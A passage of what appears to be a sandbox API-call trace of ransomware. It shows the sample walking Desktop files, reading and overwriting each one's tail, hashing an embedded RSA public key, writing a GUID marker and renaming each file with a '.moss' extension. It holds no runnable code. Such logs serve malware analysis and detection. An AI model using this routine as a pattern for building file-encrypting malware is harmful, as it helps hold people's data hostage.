(HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0170.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.285] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.285] GetCurrentThreadId () returned 0x324 [0170.285] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.285] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.285] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0x35ceae8 [0170.285] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.285] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.285] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.285] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.285] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0170.285] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0170.285] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0170.285] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0170.285] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0170.285] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0170.285] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0170.285] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0170.285] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0170.285] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0170.285] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0170.285] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0170.285] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0170.285] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0170.285] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.286] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x13460, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.286] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.286] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0170.286] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.286] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.287] CloseHandle (hObject=0x664) returned 1 [0170.288] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\M_TQtkh1FRb6dyX3oc1C.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\m_tqtkh1frb6dyx3oc1c.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\M_TQtkh1FRb6dyX3oc1C.swf.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\m_tqtkh1frb6dyx3oc1c.swf.moss")) returned 1 [0170.289] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.289] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.289] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.290] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0170.290] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37605670, ftCreationTime.dwHighDateTime=0x1d5e4bd, ftLastAccessTime.dwLowDateTime=0x5d19c510, ftLastAccessTime.dwHighDateTime=0x1d5e597, ftLastWriteTime.dwLowDateTime=0x5d19c510, ftLastWriteTime.dwHighDateTime=0x1d5e597, nFileSizeHigh=0x0, nFileSizeLow=0x13439, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NOTJBOAQYbhO9I2wCea.m4a", cAlternateFileName="NOTJBO~1.M4A")) returned 1 [0170.291] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\NOTJBOAQYbhO9I2wCea.m4a") returned=".m4a" [0170.291] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\NOTJBOAQYbhO9I2wCea.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\notjboaqybho9i2wcea.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.291] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=78905) returned 1 [0170.291] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.294] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x13413, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.294] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.295] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x13439, lpOverlapped=0x0) returned 1 [0170.296] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.296] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.296] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.296] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0170.297] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.297] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.297] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.297] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.297] GetLastError () returned 0x0 [0170.298] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.298] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0170.298] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0170.298] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.298] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.298] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.298] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.298] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.298] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0170.298] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc2d8 | out: hHeap=0xcd0000) returned 1 [0170.298] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc2f0 | out: hHeap=0xcd0000) returned 1 [0170.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0170.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0170.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0170.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd310 [0170.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc2f0 [0170.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0170.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fc2d8 [0170.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0170.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3b44690 [0170.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0170.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0170.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0170.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0170.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0170.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0170.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0170.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc2f0 | out: hHeap=0xcd0000) returned 1 [0170.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0170.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc2d8 | out: hHeap=0xcd0000) returned 1 [0170.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0170.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0170.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0170.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0170.299] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0170.299] GetCurrentThreadId () returned 0x324 [0170.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x3b44690 [0170.299] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b4a190 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ebf0 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.300] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.300] GetCurrentThreadId () returned 0x324 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.300] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0x35ceae8 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.300] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.300] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.300] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0170.300] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0170.300] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0170.300] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0170.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0170.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc2d8 [0170.301] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0170.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0170.301] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0170.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0170.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0170.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0170.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0170.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc2f0 [0170.301] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0170.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0170.301] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0170.301] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc2c0 [0170.302] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x13439, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.302] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.302] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.302] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.302] CloseHandle (hObject=0x664) returned 1 [0170.304] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x35b7de8 [0170.304] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8a0) returned 0x3b4b098 [0170.304] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\NOTJBOAQYbhO9I2wCea.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\notjboaqybho9i2wcea.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\NOTJBOAQYbhO9I2wCea.m4a.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\notjboaqybho9i2wcea.m4a.moss")) returned 1 [0170.306] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3392880, ftCreationTime.dwHighDateTime=0x1d5e5d5, ftLastAccessTime.dwLowDateTime=0x8ac14960, ftLastAccessTime.dwHighDateTime=0x1d5d9c7, ftLastWriteTime.dwLowDateTime=0x8ac14960, ftLastWriteTime.dwHighDateTime=0x1d5d9c7, nFileSizeHigh=0x0, nFileSizeLow=0x9a1a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wsTyr.mkv", cAlternateFileName="")) returned 1 [0170.306] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0170.306] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0170.306] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\wsTyr.mkv") returned=".mkv" [0170.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xxuaxzQ\\wsTyr.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xxuaxzq\\wstyr.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.306] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=39450) returned 1 [0170.306] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.310] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x99f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.310] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.311] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.311] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x9a1a, lpOverlapped=0x0) returned 1 [0170.311] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.311] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0170.311] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.311] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.311] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0170.312] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.312] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.312] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.312] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0170.313] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: 